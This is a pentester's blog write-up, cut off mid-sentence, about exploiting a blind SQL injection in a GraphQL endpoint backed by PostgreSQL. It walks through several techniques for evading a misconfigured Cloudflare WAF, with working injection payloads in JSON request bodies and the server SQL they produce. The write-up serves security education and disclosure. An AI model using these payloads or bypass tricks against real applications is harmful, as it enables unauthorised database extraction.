Blog/Portfolio of George Skouroupathis / Mon, 09 Feb 2026 20:20:45 +0000 Mon, 09 Feb 2026 20:20:45 +0000 Jekyll v3.10.0 <p> In August 2021 I was tasked with performing a Web Application security assessment for a large client. The automated scanning tool returned a possible SQL injection which, just like last time, couldn't be exploited using the said tool. The reason was Cloudflare's WAF and more specifically its SQL Injection filter. </p> <h4 id="disclaimer">Disclaimer</h4> <p> The techniques described below do not compose a "universal" bypassing technique as the one I've discovered previously and described <a href="https://www.astrocamel.com/web/2020/09/04/how-i-bypassed-cloudflares-sql-injection-filter.html">here</a>. Definitely not all of them are applicable against a fully configured Cloudflare WAF instance. <br /> It is more accurate to say that this post describes my SQLi adventure from start to finish. During this I thought that I had bypassed Cloudflare WAF's SQLi filter. It turned out that the Cloudflare installation was not properly configured (some rules in the "OWASP Uri SQL Injection Attacks" Rule Set were not enabled). For this reason the findings were rejected for Cloudflare's bug bounty program. I feel, however, that the findings described in this post are interesting and show a number of points that security people need to notice when deploying security protections for their apps. Some partial findings might also come in handy to a person who tries to bypass WAFs in general. An attacker could leverage one or several techniques, depending on the end application, to bypass some WAFs and exfiltrate data by abusing an SQLi vulnerability. <br /> Read below and I believe you will understand what I'm talking about. </p> <h4 id="details-about-the-application">Details about the application</h4> <p> The purpose of this web application is not important for the writeup. The stack on which it is written is not really important either, except for the /graphql endpoint which is exposed on the server, and the PostgreSQL service running the queries. GraphQL is a query language which processes a query and, in this case, runs the appropriate SQL queries on the backend and returns the data requested. I've never used or read about GraphQL before this assessment, so I followed the <a href="https://graphql.org/learn/">official tutorial</a> which gave me a basic understanding. </p> <p> The queries are formed similarly to JSON objects. The application sends a POST request to the /graphql endpoint. The request body contains the GraphQL query and looks something like this: </p> <figure class="highlight"><pre><code class="language-http" data-lang="http"><span class="nf">POST</span> <span class="nn">/graphql</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">*****</span> <span class="na">Accept</span><span class="p">:</span> <span class="s">application/json</span> <span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.5</span> <span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">application/json</span> <span class="na">Cookie</span><span class="p">:</span> <span class="s">authtoken=*****</span> <span class="p">{</span><span class="nl">"query"</span><span class="p">:</span><span class="w"> </span><span class="s2">"query ($email:String!,$isValid:Boolean!,$name:Name ) { emailInUse(email:$email, isValid:$isValid, name:$name) }"</span><span class="p">,</span><span class="w"> </span><span class="nl">"variables"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"isValid"</span><span class="p">:</span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="s2">"george"</span><span class="p">,</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"X-MARK"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p> The unsanitized parameter at <b>X-MARK</b> is passed from GraphQL and replaced in a PostgreSQL stored procedure, thus allowing us to inject into an SQL query that executes on the backend server. <br /> This is pretty much what we have to know at this point about the application. In the sections following I lay out the observations I made while testing the application for the SQL injection and which led me to successful exploitation, including bypass of the Cloudflare SQLi filter. </p> <h4 id="observation-1">Observation 1</h4> <p>The first important observation made is that the server responds differently to a valid email input (i.e. when the SQL query returns data) than it does to an invalid one. The HTTP code returned is always 200, but the response body differs: </p> <p>This returns "OK":</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">;</span></code></pre></figure> <p>This returns "NOT OK":</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="s1">'a'</span><span class="o">=</span><span class="s1">'b'</span><span class="p">;</span></code></pre></figure> <p> This might not look like much at first, but it was actually the mechanism that allowed me to validate the existence of specific data in the database. It led me to the idea to perform a Blind SQL injection attack leveraging this mechanism and automate it with a script. The script constructs a payload and sends it with the POST request, which in its turn modifies the SQL query which runs on the backend server. <br /> The process is described using steps below: <ul> <li>We have a set of characters, called an <i><code>alphabet</code></i> This set includes all possible characters which can be part of a piece of data we are trying to extract from the database.</li> <li>Assume that <i><code>resource</code></i> is the SQL resource required to be retrieved. It can be the DB name, the username, a cell value in any table etc.</li> <li>The <i><code>resource</code></i> will be retrieved character-by-character. The character we are trying to retrieve is called <i><code>char</code></i>.</li> <li>We loop through the <i><code>alphabet</code></i> and we compare each of its letters against <i><code>char</code></i>.</li> <li>If there is a match we log the result and move to the next <i><code>char</code></i>.</li> <li>At the end we have the complete <i><code>resource</code></i> by concatenating all the <i><code>chars</code></i>.</li> </ul> </p> <h4 id="observation-2">Observation 2</h4> <p> The second important observation, which made things for me a lot easier, is the error message displayed in cases where the SQL query performed was malformed. The error message did not allow me to perform an Error-Based SQL injection, but instead displayed the full SQL query performed on the SQL server by PostgreSQL. It will become evident why this is important in a bit. <br /> The SQL query extracted from the error message looked something like this: </p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1 2 3 4 5 6 7 8 9 10 11 12 </pre></td><td class="code"><pre><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="o">*</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">AS</span> <span class="n">t1</span> <span class="k">LEFT</span> <span class="k">JOIN</span> <span class="n">table2</span> <span class="k">AS</span> <span class="n">t2</span> <span class="k">ON</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="k">input</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'X-MARK'</span><span class="p">)</span> <span class="k">WHERE</span> <span class="n">t1</span><span class="p">.</span><span class="n">deleted_at</span> <span class="k">IS</span> <span class="k">NULL</span> <span class="k">AND</span> <span class="n">t1</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="err">$</span><span class="mi">1</span> <span class="k">AND</span> <span class="p">(</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t1</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'X-MARK'</span><span class="p">)</span> <span class="k">OR</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="k">input</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'X-MARK'</span><span class="p">)</span> <span class="p">);</span> </pre></td></tr></tbody></table></code></pre></figure> <p> The user input that was submitted as the 'email' variable is reflected at the X-MARK. These are the two reasons that having the full SQL query was important for the exploitation process: <ol> <li>One can see that the user input is wrapped in parentheses. This piece of information makes payload production process much easier, as one would know that the input must contain the closing parenthesis that matches the opening parenthesis, in order for the end SQL query to be valid.</li> <li>User input is reflected in multiple places in the query (lines 5, 10, 11). What gave me some trouble was line #5. If it were the case where X-MARK was only reflected inside the WHERE clause, things would've been easier. But in this case I had to make sure that my input didn't mess up the table JOIN. This was necessary in order to make sure the correct table rows were produced and queried against, so that I could get the data I wanted.</li> </ol> <span class="note">NOTE:</span> The $1 sign on line #8 is a positional argument for the SQL prepared query and is substituted by the 'name' variable parameter of the HTTP Request. It was not vulnerable to SQL injection though. </p> <h4 id="first-attempt">First attempt</h4> <p> I started by trying to find the name of the current database. The SQL query to do this in PostgreSQL is: <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">current_database</span><span class="p">();</span></code></pre></figure> </p> <p> There was a lot to take into consideration and it got wild from the beginning.<br /> I had to come up with ways to bypass Cloudflare right from the beginning. </p> <h5>WAF Bypass #1</h5> <p> First of all, I had to start with comparing the first character of current_database() with the character 'a'. The way to do this is PostgreSQL is: <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="s1">'a'</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="n">substr</span><span class="p">(</span><span class="n">current_database</span><span class="p">(),</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span></code></pre></figure> Cloudflare blocks the 'substr' function, so the trick is to use either the 'left' or 'right' function. I used the 'right' function for this because 'left' gave me some trouble when trying to figure out when I had found all of the database name's characters. The new query (which compares 'a' with the <u>last</u> resource's character looks like this: <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="s1">'a'</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="k">right</span><span class="p">(</span><span class="n">current_database</span><span class="p">(),</span> <span class="mi">1</span><span class="p">);</span></code></pre></figure> and goes by undetected by the WAF. </p> <p> <span class="note">NOTE:</span> The function right(current_database(), N) returns the N rightmost characters of the database name. Because of this, when the last character is found to be, for example, <b>X</b>, the next call to the function should be: </p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="s1">'aX'</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="k">right</span><span class="p">(</span><span class="n">current_database</span><span class="p">(),</span> <span class="mi">2</span><span class="p">);</span></code></pre></figure> <p> Since we already know that we have to close an opening parenthesis in the query (from Observation #2), the body of the POST Request looks like this (only showing the 'email' variable here): </p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"a@b.c') AND ('a'=(SELECT(right((SELECT current_database()),1)))) AND ('a'='a"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p> However, remembering how the backend SQL query includes a JOIN clause (from Observation #2), I also added some extra stuff in the query to make sure the SQL Join was executed correctly in the background. The body of the POST request looked like this: </p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"a@b.c' OR t2.id = t1.id AND t2.q_id IN (1, 2, 3, 4) AND ('a'=(SELECT(right((SELECT current_database()),1)))) AND ('a'='a"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p> The subsequent SQL query on the server looked like this: </p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1 2 3 4 5 6 7 8 9 10 11 12 </pre></td><td class="code"><pre><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="o">*</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">AS</span> <span class="n">t1</span> <span class="k">LEFT</span> <span class="k">JOIN</span> <span class="n">table2</span> <span class="k">AS</span> <span class="n">t2</span> <span class="k">ON</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="k">input</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span> <span class="k">OR</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">current_database</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span> <span class="k">AND</span> <span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">WHERE</span> <span class="n">t1</span><span class="p">.</span><span class="n">deleted_at</span> <span class="k">IS</span> <span class="k">NULL</span> <span class="k">AND</span> <span class="n">t1</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="err">$</span><span class="mi">1</span> <span class="k">AND</span> <span class="p">(</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t1</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span> <span class="k">OR</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">current_database</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span> <span class="k">AND</span> <span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">OR</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="k">input</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span> <span class="k">OR</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">current_database</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span> <span class="k">AND</span> <span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="p">);</span> </pre></td></tr></tbody></table></code></pre></figure> <p> It's complicated, but the idea remains the same: if 'a' is the rightmost character of the Database name, we'll get an "OK" response from the server. </p> <p> Anyway, after submitting this request to the server, I saw the dreaded page of the (misconfigured) Cloudflare WAF telling me that my request was blocked. Time for some more fiddling! </p> <h4 id="second-attempt">Second attempt</h4> <p> Before I gave it another go, I had to understand what was Cloudflare's issue with my query. <br /> After some trial and error I figured out that the problem was the spaces in the FROM clause in the resulting server SQL query. This lead me to the second WAF bypass. </p> <h5>WAF Bypass #2</h5> <p> The second WAF bypass technique utilized here eliminates spaces in the SQL query and encloses the parts of the SQL FROM clause in parentheses. In short: </p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">col</span> <span class="k">FROM</span> <span class="n">tab</span> <span class="k">WHERE</span> <span class="n">a</span><span class="o">=</span><span class="s1">'a'</span> <span class="k">AND</span> <span class="n">b</span><span class="o">=</span><span class="s1">'b'</span><span class="p">;</span></code></pre></figure> <p>becomes</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span><span class="p">(</span><span class="n">col</span><span class="p">)</span><span class="k">FROM</span> <span class="n">tab</span> <span class="k">WHERE</span><span class="p">(</span><span class="n">a</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">b</span><span class="o">=</span><span class="s1">'b'</span><span class="p">);</span></code></pre></figure> <p>So the resulting body of the POST request becomes:</p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"a@b.c')OR(t2.id = t1.id)AND(t2.q_id IN (1, 2, 3, 4))AND('a'=(SELECT(right((SELECT current_database()),1))))AND('a'='a"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p>and the subsequent SQL query on the server looks like this:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1 2 3 4 5 6 7 8 9 10 11 12 </pre></td><td class="code"><pre><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="o">*</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">AS</span> <span class="n">t1</span> <span class="k">LEFT</span> <span class="k">JOIN</span> <span class="n">table2</span> <span class="k">AS</span> <span class="n">t2</span> <span class="k">ON</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="k">input</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">current_database</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">WHERE</span> <span class="n">t1</span><span class="p">.</span><span class="n">deleted_at</span> <span class="k">IS</span> <span class="k">NULL</span> <span class="k">AND</span> <span class="n">t1</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="err">$</span><span class="mi">1</span> <span class="k">AND</span> <span class="p">(</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t1</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">current_database</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">OR</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="k">input</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">current_database</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="p">);</span> </pre></td></tr></tbody></table></code></pre></figure> <p> The whole process could be (and was) automated at this point to find the whole value of the database name. The same process also retrieved the username (by using the <b>user</b> function) and the database version (by using the <b>version()</b> function). But what about data that was stored in the database tables? The generic query to retrieve these data, as well as the query using the bypass methods I used in my <a href="https://www.astrocamel.com/web/2020/09/04/how-i-bypassed-cloudflares-sql-injection-filter.html">previous article</a> were not working. Both were blocked: </p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">col</span> <span class="k">FROM</span> <span class="n">tab</span> <span class="k">WHERE</span> <span class="n">a</span><span class="o">=</span><span class="s1">'a'</span><span class="p">;</span> <span class="k">SELECT</span><span class="cm">/*trick comment*/</span> <span class="n">col</span> <span class="k">FROM</span><span class="cm">/*trick comment*/</span> <span class="n">tab</span> <span class="k">WHERE</span><span class="cm">/*trick comment*/</span> <span class="n">a</span><span class="o">=</span><span class="s1">'a'</span><span class="p">;</span></code></pre></figure> <p> Why were my queries blocked? The problem is the <b>FROM</b> clause that comes right after the <b>SELECT</b> clause. The following query would pass through the (misconfigured) Cloudflare WAF SQLi filter just fine: </p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">col</span> <span class="k">FROM</span> <span class="n">tab</span><span class="p">;</span></code></pre></figure> <p> As soon as the <b>WHERE</b> clause was introduced at the end of the query, the WAF would kick in and block the request. My ultimate goal was to retrieve data from any table. It was time to dig deeper into the rabbit hole. </p> <h4 id="kinda-sidetracked-third-attempt">(Kinda sidetracked) Third attempt</h4> <p> I'm giving here an early failed attempt for the SQLi, just because I'd like for this post to show people how the thought process unfolds during a pentest.<br /> In my attempt to decomplicate things (i.e. break away from all the <b>JOIN</b> and <b>FROM</b> clauses), I put to use a simple semicolon and comment trick (;--). The plan was to first retrieve the database name and then build on from there to retrieve data in tables: </p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"a@b.c')OR('a'=(SELECT(right((SELECT database_name()),1))))AND('a'='a');--"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p>The resulting SQL query on the server is the following:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1 2 3 4 5 6 7 8 9 10 11 12 </pre></td><td class="code"><pre><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="o">*</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">AS</span> <span class="n">t1</span> <span class="k">LEFT</span> <span class="k">JOIN</span> <span class="n">table2</span> <span class="k">AS</span> <span class="n">t2</span> <span class="k">ON</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="k">input</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">database_name</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">);</span><span class="c1">--')</span> <span class="k">WHERE</span> <span class="n">t1</span><span class="p">.</span><span class="n">deleted_at</span> <span class="k">IS</span> <span class="k">NULL</span> <span class="k">AND</span> <span class="n">t1</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="err">$</span><span class="mi">1</span> <span class="k">AND</span> <span class="p">(</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t1</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">database_name</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">);</span><span class="c1">--')</span> <span class="k">OR</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="k">input</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">database_name</span><span class="p">()),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">);</span><span class="c1">--')</span> <span class="p">);</span> </pre></td></tr></tbody></table></code></pre></figure> <p> Anyway, this of course doesn't work for two reasons: <ol> <li>Everything after line #5 is ignored because of the comment. This is not necessarily limiting, but I'd rather perform my SQLi inside the <b>FROM</b> clause.</li> <li>I get the following error: "bind message supplies 1 parameters, but prepared statement requires 0". This is because the <b>name</b> variable is passed to the prepared statement but line #8 is ignored so the new prepared statement does not expect the variable.</li> </ol> </p> <h4 id="fourth-attempt">Fourth attempt</h4> <p> I'm giving here another early attempt of mine to retrieve data from a table, that got me closer to my goal. What I knew until this point was that the following payload would get blocked by the WAF: </p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"a@b.c')OR(t2.id = t1.id)AND(t2.q_id IN (1, 2, 3, 4))AND('a'=(SELECT(right((SELECT column1 FROM table1 LIMIT 1 OFFSET 0),1))))AND('a'='a"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p> <span class="note">NOTE:</span> I added the <b>LIMIT</b> and <b>OFFSET</b> keywords in order to retrieve only one row from table1. <b>LIMIT</b> indicates that we only want one row retrieved and <b>OFFSET</b> indicates how many rows we want to skip before starting retrieving data. In this case <b>OFFSET 0</b> indicates that the database should skip 0 rows and return the first row in table1. This is useful in order to retrieve all the table's rows one-by-one. </p> <h5>WAF Bypass #3</h5> <p> Looking back at the SQL query retrieved from the error produced by the database server, I noticed that using the <b>FROM</b> clause might not be necessary. The table1 table is aliased as t1 in the query using the <b>AS</b> keyword, and any of its columns can be referenced based on t1. You can query the column column1 of table1 as such: </p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="n">column1</span><span class="p">;</span></code></pre></figure> <p>This passes through the (misconfigured) Cloudflare WAF just fine and thus the payload in the body of the POST request can be transformed as such:</p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"a@b.c')OR(t2.id = t1.id)AND(t2.q_id IN (1, 2, 3, 4))AND('a'=(SELECT(right((SELECT t1.column1 LIMIT 1 OFFSET 0),1))))AND('a'='a"</span><span class="p">}</span><span class="w"> </span><span 